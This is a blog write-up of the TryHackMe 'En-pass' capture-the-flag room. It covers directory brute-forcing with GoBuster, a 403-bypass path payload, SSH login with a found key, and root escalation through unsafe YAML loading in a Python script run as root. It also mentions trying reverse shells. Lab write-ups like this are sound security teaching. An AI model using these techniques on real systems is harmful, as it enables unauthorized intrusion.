marcorei7 posted: " Description: Get what you can't. Tags: security, linux Difficulty: Medium Host: TryHackMe | En-pass (by kiransau) - https://tryhackme.com/room/enpass Rustscan I started by scanning the machine with Rustscan. rustscan -a 'machine-ip'"
With the webserver on port 8001 I started a GoBuster scan in the background to find any hidden directories adding some extensions to it.
gobuster dir -u http://'machine-ip':8001/ -w /usr/share/dirb/wordlists/common.txt -x txt,php,sh,cgi,html,zip,bak,sql,old
Website
But first I went to port 8001 to view the main page. I saw three different pictures and on the bottom on two of them were some cryptic strings.
With ROT 23 I got the output "Best of Luck!!" and the second string decoded with Base64 contained the word "sadman".
The "403.php" page said "forbidden" and I'll inspect it later on.
and the "reg.php" page got me to an input field.
Then I quickly looked at the "/zip" directory and there was a ton of directories.
I downloaded the first one but extracting the content of it once again had the word "sadman" in it. A rabbit hole.
SSH key
Now the "/web" directory returned the status code 301, but that didn't stop me from trying to search through it with GoBuster.
gobuster dir -u http://'machine-ip':8001/web/ -w /usr/share/dirb/wordlists/common.txt
With this I found the directory "/resources" but again with the status code 301.
I started another scan but I couldn't find anything. Therefore I had to step it up a bit and used a bigger wordlist.
gobuster dir -u http://'machine-ip':8001/web/resources/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
Here I got the directory "/infoseek"
I ran another scan
gobuster dir -u http://'machine-ip':8001/web/resources/infoseek -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
and found the directory "/configure".
And with the next scan I finally got to the end of it.
gobuster dir -u http://'machine-ip':8001/web/resources/infoseek/configure -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
I saved the key, set up the permission with
chmod 600 key
but I still had to find a username.
PHP code
Next I went to the "reg.php" page again and looked at the source code.
I am not an expert in reading PHP code but I worked through it one by one. So first, the code pickes the input and uses the "explode()" function to split it into single items with the comma as a seperator.
I started with the very basic stuff. First an array with 9 objects starting from index 0. I knew this, because the "val[8]" part is looking at the index number 8 and the for-loop cycles through the whole code below 9 times ($i < 9).
Then I considered the string lengths of the objects form the first comparison. At index 0 it had to be 2 and at index 8 it had to be a lenghth of 3.
To fulfill the next comparison, that some values have to be different, I simply entered a random value for each object. Another interesting thing is, that all the values are from the top of my keyboard in the numeric space. Maybe that had something to do with it. But nonetheless I got a possible input with it, all seperated with a comma.
§§,!,",(,),%,=,&,???
When I entered this array, I got a password. I was probably for the SSH key I found earlier. So theres only a username missing.
403 page
Another page I wanted to inspect further was "403.php". For this I stumbled across a lot of different resources about bypassing a 403 page. I looked into tools form lobuhi, iamj0ker and DirDar. With this I collected a huge list of possiblities and edited the scripts with the other paylods I found.
As you can see, the only difference hit with
[...]/403.php/..;/
With this payload I got the username.
SSH access
Now that I collected every part, I logged in with the username, keyfile and the password.
ssh -i key imsau@'machine-ip'
Here I got the first flag (*1).
Privilege escalation
I changed my shell with Pyton3.
python3 -c 'import pty; pty.spawn("/bin/bash")'
I listed the root directory structue with
cd / ls -la *
and found something in "/opt/scripts". The "file.py" in there was a Python script importing yaml. And with execution, it calls the file "/tmp/file.yml".
Because I couldn't find a cronjob running, I loaded "pspy" to the victim machine and after a short amount of time, this whole code block got executed.
I had to search for quite a while but then I got to this post about hacking Python apps form Vickie Li. With this I wanted to insert a reversel shell first, but I couldn't get it to work with a Bash or Python shell. So I tried something different and forced the script, to display the root flag with the wall command. Here I hoped, that it was at the usual location.
I got the last flag but the fact, that I wasn't able to spawn a shell bugged me. Also the name and location for the root flag was more like a shot in the dark. So I played around some more and then I tried the next shell I got in my list and got a hit.
For the next time I have to keep in mind to try really every possible reverse shell I got. Another possibility would be setting the SUID bit for the "/bin/bash" binary.
WordPress.com
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.